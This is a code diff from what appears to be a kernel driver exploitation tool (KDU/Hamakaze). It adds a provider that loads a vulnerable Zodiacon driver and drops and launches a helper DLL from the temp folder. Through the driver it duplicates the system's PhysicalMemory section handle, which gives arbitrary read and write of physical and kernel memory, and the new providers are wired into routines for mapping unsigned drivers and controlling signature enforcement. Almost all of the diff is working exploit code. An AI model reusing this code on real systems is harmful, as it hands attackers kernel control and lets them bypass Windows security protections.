@@ -36,40 +36,10 @@ static KDU_VICTIM_PROVIDER g_ProcExpVictimSelf{
sizeof(g_ProcExpSig) // Victim dispatch bytes size
};
-/*
-* PexpMapMemory
-*
-* Purpose:
-*
-* Map physical memory.
-*
-*/
-PVOID PexpMapMemory(
- _In_ ULONG_PTR PhysicalAddress,
- _In_ ULONG NumberOfBytes,
- _In_ BOOL MapForWrite
-)
-{
- return supMapPhysicalMemory(g_PexPhysicalMemorySection,
- PhysicalAddress,
- NumberOfBytes,
- MapForWrite);
-}
+#define PexpMapMemory(PhysicalAddress, NumberOfBytes, MapForWrite) \
+ supMapPhysicalMemory(g_PexPhysicalMemorySection, PhysicalAddress, NumberOfBytes, MapForWrite)
-/*
-* PexpUnmapMemory
-*
-* Purpose:
-*
-* Unmap physical memory.
-*
-*/
-VOID PexpUnmapMemory(
- _In_ PVOID BaseAddress
-)
-{
- supUnmapPhysicalMemory(BaseAddress);
-}
+#define PexpUnmapMemory(BaseAddress) supUnmapPhysicalMemory(BaseAddress)
/*
* PexpReadWritePhysicalMemory
diff --git a/Source/Hamakaze/idrv/zodiacon.cpp b/Source/Hamakaze/idrv/zodiacon.cpp
index 239763e..2d876ab 100644
--- a/Source/Hamakaze/idrv/zodiacon.cpp
+++ b/Source/Hamakaze/idrv/zodiacon.cpp
@@ -6,7 +6,7 @@
*
* VERSION: 1.32
*
-* DATE: 20 May 2022
+* DATE: 10 Jun 2022
*
* Zodiacon driver routines.
*
@@ -20,6 +20,8 @@
#include "global.h"
#include "idrv/zodiacon.h"
+HANDLE g_ZdcPhysicalMemorySection = NULL;
+
/*
* KObExpReadVirtualMemory
*
@@ -61,4 +63,528 @@ BOOL WINAPI KObExpWriteVirtualMemory(
sizeof(VirtualAddress),
Buffer,
NumberOfBytes);
-}
\ No newline at end of file
+}
+
+#define ZdcMapMemory(PhysicalAddress, NumberOfBytes, MapForWrite) \
+ supMapPhysicalMemory(g_ZdcPhysicalMemorySection, PhysicalAddress, NumberOfBytes, MapForWrite)
+
+#define ZdcUnmapMemory(BaseAddress) supUnmapPhysicalMemory(BaseAddress)
+
+#define ZdcReadWritePhysicalMemory(PhysicalAddress, Buffer, NumberOfBytes, DoWrite) \
+ supReadWritePhysicalMemory(g_ZdcPhysicalMemorySection, PhysicalAddress, Buffer, NumberOfBytes, DoWrite)
+
+/*
+* ZdcReadPhysicalMemory
+*
+* Purpose:
+*
+* Read from physical memory.
+*
+*/
+BOOL WINAPI ZdcReadPhysicalMemory(
+ _In_ HANDLE DeviceHandle,
+ _In_ ULONG_PTR PhysicalAddress,
+ _In_ PVOID Buffer,
+ _In_ ULONG NumberOfBytes)
+{
+ UNREFERENCED_PARAMETER(DeviceHandle);
+
+ return ZdcReadWritePhysicalMemory(PhysicalAddress,
+ Buffer,
+ NumberOfBytes,
+ FALSE);
+}
+
+/*
+* ZdcWritePhysicalMemory
+*
+* Purpose:
+*
+* Write to physical memory.
+*
+*/
+BOOL WINAPI ZdcWritePhysicalMemory(
+ _In_ HANDLE DeviceHandle,
+ _In_ ULONG_PTR PhysicalAddress,
+ _In_reads_bytes_(NumberOfBytes) PVOID Buffer,
+ _In_ ULONG NumberOfBytes)
+{
+ UNREFERENCED_PARAMETER(DeviceHandle);
+
+ return ZdcReadWritePhysicalMemory(PhysicalAddress,
+ Buffer,
+ NumberOfBytes,
+ TRUE);
+}
+
+/*
+* ZdcQueryPML4Value
+*
+* Purpose:
+*
+* Locate PML4.
+*
+*/
+BOOL WINAPI ZdcQueryPML4Value(
+ _In_ HANDLE DeviceHandle,
+ _Out_ ULONG_PTR* Value)
+{
+ ULONG_PTR pbLowStub1M = 0ULL, PML4 = 0;
+ ULONG cbRead = 0x100000;
+
+ UNREFERENCED_PARAMETER(DeviceHandle);
+
+ *Value = 0;
+
+ SetLastError(ERROR_SUCCESS);
+
+ pbLowStub1M = (ULONG_PTR)ZdcMapMemory(0ULL,
+ cbRead,
+ FALSE);
+
+ if (pbLowStub1M) {
+
+ PML4 = supGetPML4FromLowStub1M(pbLowStub1M);
+ if (PML4)
+ *Value = PML4;
+
+ ZdcUnmapMemory((PVOID)pbLowStub1M);
+
+ }
+
+ return (PML4 != 0);
+}
+
+/*
+* ZdcVirtualToPhysical
+*
+* Purpose:
+*
+* Translate virtual address to the physical.
+*
+*/
+BOOL WINAPI ZdcVirtualToPhysical(
+ _In_ HANDLE DeviceHandle,
+ _In_ ULONG_PTR VirtualAddress,
+ _Out_ ULONG_PTR* PhysicalAddress)
+{
+ return PwVirtualToPhysical(DeviceHandle,
+ ZdcQueryPML4Value,
+ ZdcReadPhysicalMemory,
+ VirtualAddress,
+ PhysicalAddress);
+}
+
+/*
+* ZdcReadKernelVirtualMemory
+*
+* Purpose:
+*
+* Read virtual memory.
+*
+*/
+BOOL WINAPI ZdcReadKernelVirtualMemory(
+ _In_ HANDLE DeviceHandle,
+ _In_ ULONG_PTR Address,
+ _Out_writes_bytes_(NumberOfBytes) PVOID Buffer,
+ _In_ ULONG NumberOfBytes)
+{
+ BOOL bResult;
+ ULONG_PTR physicalAddress = 0;
+
+ UNREFERENCED_PARAMETER(DeviceHandle);
+ SetLastError(ERROR_SUCCESS);
+
+ bResult = ZdcVirtualToPhysical(DeviceHandle,
+ Address,
+ &physicalAddress);
+
+ if (bResult) {
+
+ bResult = ZdcReadWritePhysicalMemory(physicalAddress,
+ Buffer,
+ NumberOfBytes,
+ FALSE);
+
+ }
+
+ return bResult;
+}
+
+/*
+* ZdcWriteKernelVirtualMemory
+*
+* Purpose:
+*
+* Write virtual memory.
+*
+*/
+BOOL WINAPI ZdcWriteKernelVirtualMemory(
+ _In_ HANDLE DeviceHandle,
+ _In_ ULONG_PTR Address,
+ _In_reads_bytes_(NumberOfBytes) PVOID Buffer,
+ _In_ ULONG NumberOfBytes)
+{
+ BOOL bResult;
+ ULONG_PTR physicalAddress = 0;
+
+ UNREFERENCED_PARAMETER(DeviceHandle);
+ SetLastError(ERROR_SUCCESS);
+
+ bResult = ZdcVirtualToPhysical(DeviceHandle,
+ Address,
+ &physicalAddress);
+
+ if (bResult) {
+
+ bResult = ZdcReadWritePhysicalMemory(physicalAddress,
+ Buffer,
+ NumberOfBytes,
+ TRUE);
+
+ }
+
+ return bResult;
+}
+
+/*
+* ZdcpOpenDriver
+*
+* Purpose:
+*
+* Open Zodiacon drivers with their locking features in mind.
+*
+*/
+BOOL WINAPI ZdcpOpenDriver(
+ _In_ PVOID Param
+)
+{
+ BOOL bResult = FALSE;
+ PVOID ipcServer = NULL;
+ KDU_CONTEXT* Context = (PKDU_CONTEXT)Param;
+ DWORD cch;
+ ULONG resourceSize = 0;
+ WCHAR szTemp[MAX_PATH + 1], szFileName[MAX_PATH * 2];
+ LPWSTR lpCommand;
+ LPWSTR lpTargetName;
+
+ switch (Context->Provider->LoadData->ResourceId) {
+
+ case IDR_KREGEXP:
+ lpTargetName = (LPWSTR)ZODIACON_REGEXP_EXE;
+ lpCommand = (LPWSTR)L"1";
+ break;
+
+ case IDR_KOBJEXP:
+ default:
+ lpCommand = (LPWSTR)L"0";
+ lpTargetName = (LPWSTR)ZODIACON_SYSEXP_EXE;
+ break;
+ }
+
+ RtlSecureZeroMemory(&szTemp, sizeof(szTemp));
+ cch = supExpandEnvironmentStrings(L"%temp%", szTemp, MAX_PATH);
+ if (cch == 0 || cch > MAX_PATH) {
+ SetLastError(ERROR_NOT_ENOUGH_MEMORY);
+ return FALSE;
+ }
+
+ PBYTE dllBuffer;
+
+ dllBuffer = (PBYTE)KDULoadResource(IDR_TAIGEI64,
+ GetModuleHandle(NULL),
+ &resourceSize,
+ PROVIDER_RES_KEY,
+ TRUE);
+
+ if (dllBuffer == NULL) {
+
+ supPrintfEvent(kduEventError,
+ "[!] Failed to load helper dll\r\n");
+
+ return FALSE;
+
+ }
+
+ if (supReplaceDllEntryPoint(dllBuffer,
+ resourceSize,
+ (LPCSTR)"RegisterForProvider2",
+ TRUE))
+ {
+ StringCchPrintf(szFileName, MAX_PATH * 2,
+ TEXT("%ws\\%ws"),
+ szTemp,
+ lpTargetName);
+
+ NTSTATUS ntStatus;
+
+ if (supWriteBufferToFile(szFileName,
+ dllBuffer,
+ resourceSize,
+ TRUE,
+ FALSE,
+ &ntStatus))
+ {
+
+ STARTUPINFO si;
+ PROCESS_INFORMATION pi;
+
+ RtlSecureZeroMemory(&si, sizeof(si));
+ RtlSecureZeroMemory(&pi, sizeof(pi));
+
+ si.cb = sizeof(si);
+ GetStartupInfo(&si);
+
+ if (CreateProcess(szFileName,
+ lpCommand,
+ NULL,
+ NULL,
+ TRUE,
+ CREATE_SUSPENDED,
+ NULL,
+ szTemp,
+ &si,
+ &pi))
+ {
+
+ ipcServer = IpcStartApiServer(supIpcDuplicateHandleCallback,
+ supIpcOnException,
+ NULL,
+ NULL,
+ (PVOID)Context);
+
+ ResumeThread(pi.hThread);
+ }
+
+ if (ipcServer) {
+ WaitForSingleObject(pi.hProcess, INFINITE);
+ }
+
+ CloseHandle(pi.hThread);
+ CloseHandle(pi.hProcess);
+ bResult = (Context->DeviceHandle != NULL);
+
+ }
+ else {
+ supShowHardError("[!] Failed to write help dll on disk", ntStatus);
+ }
+
+ }
+ else {
+ supPrintfEvent(kduEventError, "[!] Error while configuring helper dll\r\n");
+ }
+
+ supHeapFree(dllBuffer);
+
+ return bResult;
+}
+
+/*
+* ZdcDuplicateHandle2
+*
+* Purpose:
+*
+* Duplicate handle via Zodiacon driver request.
+*
+*/
+BOOL ZdcDuplicateHandle2(
+ _In_ HANDLE DeviceHandle,
+ _In_ HANDLE SourceProcessId,
+ _In_ HANDLE SourceProcessHandle,
+ _In_ HANDLE SourceHandle,
+ _Out_ PHANDLE TargetHandle,
+ _In_ ACCESS_MASK DesiredAccess,
+ _In_ ULONG HandleAttributes,
+ _In_ ULONG Options
+)
+{
+ KZODIACON_DUP_DATA_V2 request;
+
+ UNREFERENCED_PARAMETER(SourceProcessHandle);
+ UNREFERENCED_PARAMETER(HandleAttributes);
+ UNREFERENCED_PARAMETER(Options);
+
+ RtlSecureZeroMemory(&request, sizeof(request));
+ request.SourcePid = HandleToUlong(SourceProcessId);
+ request.Handle = SourceHandle;
+ request.AccessMask = DesiredAccess;
+ request.Flags = DUPLICATE_SAME_ACCESS;
+
+ *TargetHandle = NULL;
+
+ return supCallDriver(DeviceHandle,
+ IOCTL_KANYEXP_DUPLICATE_OBJECT,
+ &request,
+ sizeof(request),
+ TargetHandle,
+ sizeof(PVOID));
+}
+
+/*
+* ZdcDuplicateHandle
+*
+* Purpose:
+*
+* Duplicate handle via Zodiacon driver request.
+*
+*/
+BOOL ZdcDuplicateHandle(
+ _In_ HANDLE DeviceHandle,
+ _In_ HANDLE SourceProcessId,
+ _In_ HANDLE SourceProcessHandle,
+ _In_ HANDLE SourceHandle,
+ _Out_ PHANDLE TargetHandle,
+ _In_ ACCESS_MASK DesiredAccess,
+ _In_ ULONG HandleAttributes,
+ _In_ ULONG Options
+)
+{
+ KZODIACON_DUP_DATA request;
+
+ UNREFERENCED_PARAMETER(SourceProcessHandle);
+ UNREFERENCED_PARAMETER(HandleAttributes);
+ UNREFERENCED_PARAMETER(Options);
+
+ RtlSecureZeroMemory(&request, sizeof(request));
+ request.SourcePid = HandleToUlong(SourceProcessId);
+ request.Handle = HandleToUlong(SourceHandle);
+ request.AccessMask = DesiredAccess;
+ request.Flags = DUPLICATE_SAME_ACCESS;
+
+ *TargetHandle = NULL;
+
+ return supCallDriver(DeviceHandle,
+ IOCTL_KANYEXP_DUPLICATE_OBJECT,
+ &request,
+ sizeof(request),
+ TargetHandle,
+ sizeof(PVOID));
+}
+
+/*
+* ZdcRegisterDriver
+*
+* Purpose:
+*
+* Driver initialization routine.
+*
+*/
+BOOL WINAPI ZdcRegisterDriver(
+ _In_ HANDLE DeviceHandle,
+ _In_opt_ PVOID Param)
+{
+ ULONG DriverId = PtrToUlong(Param);
+ pfnDuplicateHandleCallback callback;
+
+ //
+ // Workaround for Yosifovich bugs.
+ //
+
+ switch (DriverId) {
+ case IDR_KREGEXP:
+ callback = ZdcDuplicateHandle2;
+ break;
+ default:
+ callback = ZdcDuplicateHandle;
+ break;
+ }
+
+ return supOpenPhysicalMemory2(DeviceHandle,
+ callback,
+ &g_ZdcPhysicalMemorySection);
+}
+
+/*
+* ZdcUnregisterDriver
+*
+* Purpose:
+*
+* Free driver related resources.
+*
+*/
+BOOL WINAPI ZdcUnregisterDriver(
+ _In_ HANDLE DeviceHandle)
+{
+ UNREFERENCED_PARAMETER(DeviceHandle);
+
+ if (g_ZdcPhysicalMemorySection) {
+ NtClose(g_ZdcPhysicalMemorySection);
+ g_ZdcPhysicalMemorySection = NULL;
+ }
+
+ return TRUE;
+}
+
+/*
+* ZdcStartVulnerableDriver
+*
+* Purpose:
+*
+* Load/open vulnerable driver callback.
+*
+*/
+BOOL ZdcStartVulnerableDriver(
+ _In_ KDU_CONTEXT* Context
+)
+{
+ BOOL bLoaded = FALSE;
+ NTSTATUS ntStatus;
+ KDU_DB_ENTRY* provLoadData = Context->Provider->LoadData;
+ LPWSTR lpDeviceName = provLoadData->DeviceName;
+ LPWSTR lpDriverName = provLoadData->DriverName;
+ LPWSTR lpFullFileName = Context->DriverFileName;
+
+ //
+ // Check if driver already loaded.
+ //
+ if (supIsObjectExists((LPWSTR)L"\\Device", lpDeviceName)) {
+
+ supPrintfEvent(kduEventError,
+ "[!] Vulnerable driver is already loaded\r\n");
+
+ bLoaded = TRUE;
+ }
+ else {
+
+ //
+ // Driver is not loaded, load it.
+ //
+ if (!KDUProvExtractVulnerableDriver(Context))
+ return FALSE;
+
+ ntStatus = supLoadDriverEx(lpDriverName,
+ lpFullFileName,
+ FALSE,
+ NULL,
+ NULL);
+
+ if (NT_SUCCESS(ntStatus)) {
+
+ supPrintfEvent(kduEventInformation,
+ "[+] Vulnerable driver \"%ws\" loaded\r\n", lpDriverName);
+
+ bLoaded = TRUE;
+ }
+ else {
+ supShowHardError("[!] Unable to load vulnerable driver", ntStatus);
+ DeleteFile(lpFullFileName);
+ }
+
+ }
+
+ if (bLoaded) {
+
+ printf_s("[+] Acquiring handle for driver device \"%ws\" -> please wait, this can take a few seconds\r\n",
+ provLoadData->DeviceName);
+
+ if (ZdcpOpenDriver(Context)) {
+
+ supPrintfEvent(kduEventInformation,
+ "[+] Successfully acquired handle for driver device \"%ws\"\r\n",
+ provLoadData->DeviceName);
+
+ }
+ }
+
+ return (Context->DeviceHandle != NULL);
+}
diff --git a/Source/Hamakaze/idrv/zodiacon.h b/Source/Hamakaze/idrv/zodiacon.h
index 3f8c7eb..96f96dc 100644
--- a/Source/Hamakaze/idrv/zodiacon.h
+++ b/Source/Hamakaze/idrv/zodiacon.h
@@ -6,9 +6,9 @@
*
* VERSION: 1.32
*
-* DATE: 20 May 2023
+* DATE: 10 Jun 2023
*
-* Zodiacon driver interface header.
+* Zodiacon drivers interface header.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
@@ -19,12 +19,38 @@
#pragma once
+#define ZODIACON_DEVICE (DWORD)0x8000
+
+#define ZODIACON_DUP_HANDLE (DWORD)0x801
+
+#define IOCTL_KANYEXP_DUPLICATE_OBJECT \
+ CTL_CODE(ZODIACON_DEVICE, ZODIACON_DUP_HANDLE, METHOD_BUFFERED, FILE_ANY_ACCESS)
+
#define IOCTL_KOBEXP_READ_VMEM \
CTL_CODE(FILE_DEVICE_UNKNOWN, 0x901, METHOD_OUT_DIRECT, FILE_READ_ACCESS)
#define IOCTL_KOBEXP_WRITE_VMEM \
CTL_CODE(FILE_DEVICE_UNKNOWN, 0x902, METHOD_IN_DIRECT, FILE_WRITE_ACCESS)
+typedef struct _KZODIACON_DUP_DATA {
+ ULONG Handle;
+ ULONG SourcePid;
+ ULONG AccessMask;
+ ULONG Flags;
+} KZODIACON_DUP_DATA, *PKZODIACON_DUP_DATA;
+
+//
+// Yep, screwed up with previously compiled drivers.
+//
+
+typedef struct _KZODIACON_DUP_DATA_V2 {
+ HANDLE Handle;
+ ULONG SourcePid;
+ ULONG AccessMask;
+ ULONG Flags;
+} KZODIACON_DUP_DATA_V2, *PKZODIACON_DUP_DATA_V2;
+
+
BOOL WINAPI KObExpReadVirtualMemory(
_In_ HANDLE DeviceHandle,
_In_ ULONG_PTR VirtualAddress,
@@ -36,3 +62,46 @@ BOOL WINAPI KObExpWriteVirtualMemory(
_In_ ULONG_PTR VirtualAddress,
_In_reads_bytes_(NumberOfBytes) PVOID Buffer,
_In_ ULONG NumberOfBytes);
+
+BOOL WINAPI ZdcWriteKernelVirtualMemory(
+ _In_ HANDLE DeviceHandle,
+ _In_ ULONG_PTR Address,
+ _In_reads_bytes_(NumberOfBytes) PVOID Buffer,
+ _In_ ULONG NumberOfBytes);
+
+BOOL WINAPI ZdcReadKernelVirtualMemory(
+ _In_ HANDLE DeviceHandle,
+ _In_ ULONG_PTR Address,
+ _Out_writes_bytes_(NumberOfBytes) PVOID Buffer,
+ _In_ ULONG NumberOfBytes);
+
+BOOL WINAPI ZdcVirtualToPhysical(
+ _In_ HANDLE DeviceHandle,
+ _In_ ULONG_PTR VirtualAddress,
+ _Out_ ULONG_PTR* PhysicalAddress);
+
+BOOL WINAPI ZdcQueryPML4Value(
+ _In_ HANDLE DeviceHandle,
+ _Out_ ULONG_PTR* Value);
+
+BOOL WINAPI ZdcWritePhysicalMemory(
+ _In_ HANDLE DeviceHandle,
+ _In_ ULONG_PTR PhysicalAddress,
+ _In_reads_bytes_(NumberOfBytes) PVOID Buffer,
+ _In_ ULONG NumberOfBytes);
+
+BOOL WINAPI ZdcReadPhysicalMemory(
+ _In_ HANDLE DeviceHandle,
+ _In_ ULONG_PTR PhysicalAddress,
+ _In_ PVOID Buffer,
+ _In_ ULONG NumberOfBytes);
+
+BOOL WINAPI ZdcRegisterDriver(
+ _In_ HANDLE DeviceHandle,
+ _In_opt_ PVOID Param);
+
+BOOL WINAPI ZdcUnregisterDriver(
+ _In_ HANDLE DeviceHandle);
+
+BOOL ZdcStartVulnerableDriver(
+ _In_ KDU_CONTEXT* Context);
diff --git a/Source/Hamakaze/kduplist.h b/Source/Hamakaze/kduplist.h
index fb9dff9..b5af61e 100644
--- a/Source/Hamakaze/kduplist.h
+++ b/Source/Hamakaze/kduplist.h
@@ -6,7 +6,7 @@
*
* VERSION: 1.32
*
-* DATE: 20 May 2023
+* DATE: 10 Jun 2023
*
* Providers global list.
*
@@ -970,6 +970,54 @@ static KDU_PROVIDER g_KDUProviders[] =
(provReadPhysicalMemory)NULL,
(provWritePhysicalMemory)NULL,
+ (provValidatePrerequisites)NULL
+ },
+
+ {
+ NULL,
+
+ (provStartVulnerableDriver)ZdcStartVulnerableDriver,
+ (provStopVulnerableDriver)KDUProvStopVulnerableDriver,
+
+ (provRegisterDriver)ZdcRegisterDriver,
+ (provUnregisterDriver)ZdcUnregisterDriver,
+ (provPreOpenDriver)NULL,
+ (provPostOpenDriver)NULL,
+ (provMapDriver)KDUMapDriver,
+ (provControlDSE)KDUControlDSE,
+
+ (provReadKernelVM)ZdcReadKernelVirtualMemory,
+ (provWriteKernelVM)ZdcWriteKernelVirtualMemory,
+
+ (provVirtualToPhysical)ZdcVirtualToPhysical,
+ (provQueryPML4)ZdcQueryPML4Value,
+ (provReadPhysicalMemory)ZdcReadPhysicalMemory,
+ (provWritePhysicalMemory)ZdcWritePhysicalMemory,
+
+ (provValidatePrerequisites)NULL
+ },
+
+ {
+ NULL,
+
+ (provStartVulnerableDriver)ZdcStartVulnerableDriver,
+ (provStopVulnerableDriver)KDUProvStopVulnerableDriver,
+
+ (provRegisterDriver)ZdcRegisterDriver,
+ (provUnregisterDriver)ZdcUnregisterDriver,
+ (provPreOpenDriver)NULL,
+ (provPostOpenDriver)NULL,
+ (provMapDriver)KDUMapDriver,
+ (provControlDSE)KDUControlDSE,
+
+ (provReadKernelVM)ZdcReadKernelVirtualMemory,
+ (provWriteKernelVM)ZdcWriteKernelVirtualMemory,
+
+ (provVirtualToPhysical)ZdcVirtualToPhysical,
+ (provQueryPML4)ZdcQueryPML4Value,
+ (provReadPhysicalMemory)ZdcReadPhysicalMemory,
+ (provWritePhysicalMemory)ZdcWritePhysicalMemory,
+
(provValidatePrerequisites)NULL
}
};
diff --git a/Source/Hamakaze/res/SB_SMBUS_SDK.bin b/Source/Hamakaze/res/SB_SMBUS_SDK.bin
index 50448bd..8308b06 100644
Binary files a/Source/Hamakaze/res/SB_SMBUS_SDK.bin and b/Source/Hamakaze/res/SB_SMBUS_SDK.bin differ
diff --git a/Source/Hamakaze/res/Taigei32.bin b/Source/Hamakaze/res/Taigei32.bin
index a29a0e4..66aa218 100644
Binary files a/Source/Hamakaze/res/Taigei32.bin and b/Source/Hamakaze/res/Taigei32.bin differ
diff --git a/Source/Hamakaze/sup.cpp b/Source/Hamakaze/sup.cpp
index 68c1754..7927c4b 100644
--- a/Source/Hamakaze/sup.cpp
+++ b/Source/Hamakaze/sup.cpp
@@ -4,9 +4,9 @@
*
* TITLE: SUP.CPP
*
-* VERSION: 1.31
+* VERSION: 1.32
*
-* DATE: 14 Apr 2023
+* DATE: 10 Jun 2023
*
* Program global support routines.
*
@@ -314,6 +314,131 @@ BOOL WINAPI supReadWritePhysicalMemory(
return bResult;
}
+/*
+* supOpenPhysicalMemory2
+*
+* Purpose:
+*
+* Locate and open physical memory section for read/write.
+*
+*/
+BOOL WINAPI supOpenPhysicalMemory2(
+ _In_ HANDLE DeviceHandle,
+ _In_ pfnDuplicateHandleCallback DuplicateHandleCallback,
+ _Out_ PHANDLE PhysicalMemoryHandle)
+{
+ BOOL bResult = FALSE;
+ DWORD dwError = ERROR_NOT_FOUND;
+ ULONG sectionObjectType = (ULONG)-1;
+ HANDLE sectionHandle = NULL;
+ PSYSTEM_HANDLE_INFORMATION_EX handleArray = NULL;
+ UNICODE_STRING ustr;
+ OBJECT_ATTRIBUTES obja;
+ UNICODE_STRING usSection;
+
+ do {
+
+ *PhysicalMemoryHandle = NULL;
+
+ RtlInitUnicodeString(&ustr, L"\\KnownDlls\\kernel32.dll");
+ InitializeObjectAttributes(&obja, &ustr, OBJ_CASE_INSENSITIVE, NULL, NULL);
+
+ NTSTATUS ntStatus = NtOpenSection(§ionHandle, SECTION_QUERY, &obja);
+
+ if (!NT_SUCCESS(ntStatus)) {
+ dwError = RtlNtStatusToDosError(ntStatus);
+ break;
+ }
+
+ handleArray = (PSYSTEM_HANDLE_INFORMATION_EX)supGetSystemInfo(SystemExtendedHandleInformation);
+ if (handleArray == NULL) {
+ dwError = ERROR_NOT_ENOUGH_MEMORY;
+ break;
+ }
+
+ ULONG i;
+ DWORD currentProcessId = GetCurrentProcessId();
+
+ for (i = 0; i < handleArray->NumberOfHandles; i++) {
+ if (handleArray->Handles[i].UniqueProcessId == currentProcessId &&
+ handleArray->Handles[i].HandleValue == (ULONG_PTR)sectionHandle)
+ {
+ sectionObjectType = handleArray->Handles[i].ObjectTypeIndex;
+ break;
+ }
+ }
+
+ NtClose(sectionHandle);
+ sectionHandle = NULL;
+
+ if (sectionObjectType == (ULONG)-1) {
+ dwError = ERROR_INVALID_DATATYPE;
+ break;
+ }
+
+ RtlInitUnicodeString(&usSection, L"\\Device\\PhysicalMemory");
+
+ for (i = 0; i < handleArray->NumberOfHandles; i++) {
+ if (handleArray->Handles[i].UniqueProcessId == SYSTEM_PID_MAGIC &&
+ handleArray->Handles[i].ObjectTypeIndex == (ULONG_PTR)sectionObjectType &&
+ handleArray->Handles[i].GrantedAccess == SECTION_ALL_ACCESS)
+ {
+ HANDLE testHandle = NULL;
+
+ if (DuplicateHandleCallback(DeviceHandle,
+ UlongToHandle(SYSTEM_PID_MAGIC),
+ NULL,
+ (HANDLE)handleArray->Handles[i].HandleValue,
+ &testHandle,
+ MAXIMUM_ALLOWED,
+ 0,
+ 0))
+ {
+ union {
+ BYTE* Buffer;
+ POBJECT_NAME_INFORMATION Information;
+ } NameInfo;
+
+ NameInfo.Buffer = NULL;
+
+ ntStatus = supQueryObjectInformation(testHandle,
+ ObjectNameInformation,
+ (PVOID*)&NameInfo.Buffer,
+ NULL,
+ (PNTSUPMEMALLOC)supHeapAlloc,
+ (PNTSUPMEMFREE)supHeapFree);
+
+ if (NT_SUCCESS(ntStatus) && NameInfo.Buffer) {
+
+ if (RtlEqualUnicodeString(&usSection, &NameInfo.Information->Name, TRUE)) {
+ *PhysicalMemoryHandle = testHandle;
+ bResult = TRUE;
+ }
+
+ supHeapFree(NameInfo.Buffer);
+ }
+
+ if (bResult == FALSE)
+ NtClose(testHandle);
+ }
+
+ if (bResult)
+ break;
+
+ }
+ }
+
+ } while (FALSE);
+
+ if (sectionHandle) NtClose(sectionHandle);
+ if (handleArray) supHeapFree(handleArray);
+
+ if (bResult) dwError = ERROR_SUCCESS;
+
+ SetLastError(dwError);
+ return bResult;
+}
+
/*
* supOpenPhysicalMemory
*
@@ -3355,3 +3480,99 @@ VOID supShowWin32Error(
Win32Error);
}
}
+
+/*
+* supIpcOnException
+*
+* Purpose:
+*
+* ALPC receive exception callback.
+*
+*/
+VOID CALLBACK supIpcOnException(
+ _In_ ULONG ExceptionCode,
+ _In_opt_ PVOID UserContext
+)
+{
+ UNREFERENCED_PARAMETER(UserContext);
+
+ supPrintfEvent(kduEventError,
+ "[!] Exception 0x%lx thrown during IPC callback\r\n", ExceptionCode);
+}
+
+/*
+* supIpcDuplicateHandleCallback
+*
+* Purpose:
+*
+* ALPC receive message callback for IPC_GET_HANDLE case.
+*
+*/
+VOID CALLBACK supIpcDuplicateHandleCallback(
+ _In_ PCLIENT_ID ClientId,
+ _In_ PKDU_MSG Message,
+ _In_opt_ PVOID UserContext
+)
+{
+ KDU_CONTEXT* Context = (PKDU_CONTEXT)UserContext;
+
+ if (Context == NULL)
+ return;
+
+ __try {
+
+ if (Message->Function == IPC_GET_HANDLE &&
+ Message->Status == STATUS_SECRET_TOO_LONG)
+ {
+ HANDLE hProcess = NULL, hNewHandle = NULL;
+ OBJECT_ATTRIBUTES obja;
+
+ InitializeObjectAttributes(&obja, NULL, 0, NULL, NULL);
+
+ if (NT_SUCCESS(NtOpenProcess(&hProcess,
+ PROCESS_QUERY_INFORMATION | PROCESS_DUP_HANDLE | PROCESS_TERMINATE,
+ &obja,
+ ClientId)))
+ {
+ PVOID wow64Information = NULL;
+ ULONG returnLength;
+ BOOL validLength = FALSE;
+
+ if (NT_SUCCESS(NtQueryInformationProcess(hProcess,
+ ProcessWow64Information,
+ &wow64Information,
+ sizeof(wow64Information),
+ &returnLength)))
+ {
+ if (wow64Information == NULL)
+ validLength = (Message->ReturnedLength == sizeof(HANDLE));
+ else
+ validLength = (Message->ReturnedLength == sizeof(ULONG));
+
+ if (validLength) {
+
+ if (NT_SUCCESS(NtDuplicateObject(
+ hProcess,
+ (HANDLE)Message->Data,
+ NtCurrentProcess(),
+ &hNewHandle,
+ 0,
+ 0,
+ DUPLICATE_SAME_ACCESS)))
+ {
+ Context->DeviceHandle = hNewHandle;
+ }
+
+ }
+
+ }
+ NtTerminateProcess(hProcess, STATUS_TOO_MANY_SECRETS);
+ NtClose(hProcess);
+ }
+
+ }
+ }
+ __except (EXCEPTION_EXECUTE_HANDLER) {
+ return;
+ }
+}
diff --git a/Source/Hamakaze/sup.h b/Source/Hamakaze/sup.h
index 3b96aa7..73adc75 100644
--- a/Source/Hamakaze/sup.h
+++ b/Source/Hamakaze/sup.h
@@ -4,9 +4,9 @@
*
* TITLE: SUP.H
*
-* VERSION: 1.31
+* VERSION: 1.32
*
-* DATE: 08 Apr 2023
+* DATE: 10 Jun 2023
*
* Support routines header file.
*
@@ -42,7 +42,7 @@ typedef BOOL(CALLBACK* pfnOpenProcessCallback)(
typedef BOOL(CALLBACK* pfnDuplicateHandleCallback)(
_In_ HANDLE DeviceHandle,
_In_ HANDLE SourceProcessId, //some drivers need pid not handle
- _In_ HANDLE SourceProcessHandle,
+ _In_opt_ HANDLE SourceProcessHandle,
_In_ HANDLE SourceHandle,
_Out_ PHANDLE TargetHandle,
_In_ ACCESS_MASK DesiredAccess,
@@ -138,6 +138,11 @@ BOOL WINAPI supReadWritePhysicalMemory(
_In_ ULONG NumberOfBytes,
_In_ BOOLEAN DoWrite);
+BOOL WINAPI supOpenPhysicalMemory2(
+ _In_ HANDLE DeviceHandle,
+ _In_ pfnDuplicateHandleCallback DuplicateHandleCallback,
+ _Out_ PHANDLE PhysicalMemoryHandle);
+
BOOL WINAPI supOpenPhysicalMemory(
_In_ HANDLE DeviceHandle,
_In_ pfnOpenProcessCallback OpenProcessCallback,
@@ -386,3 +391,12 @@ VOID supShowHardError(
VOID supShowWin32Error(
_In_ LPCSTR Message,
_In_ DWORD Win32Error);
+
+VOID CALLBACK supIpcOnException(
+ _In_ ULONG ExceptionCode,
+ _In_opt_ PVOID UserContext);
+
+VOID CALLBACK supIpcDuplicateHandleCallback(
+ _In_ PCLIENT_ID ClientId,
+ _In_ PKDU_MSG Message,
+ _In_opt_ PVOID UserContext);
diff --git a/Source/Hamakaze/tests.cpp b/Source/Hamakaze/tests.cpp
index 69c68b9..09e1c27 100644
--- a/Source/Hamakaze/tests.cpp
+++ b/Source/Hamakaze/tests.cpp
@@ -188,7 +188,7 @@ VOID KDUTest()
// KDUTestLoad();
// TestSymbols();
- Context = KDUProviderCreate(36,
+ Context = KDUProviderCreate(38,
FALSE,
NT_WIN10_20H1,
KDU_SHELLCODE_V1,
diff --git a/Source/Shared/consts.h b/Source/Shared/consts.h
index 8a63999..e602a21 100644
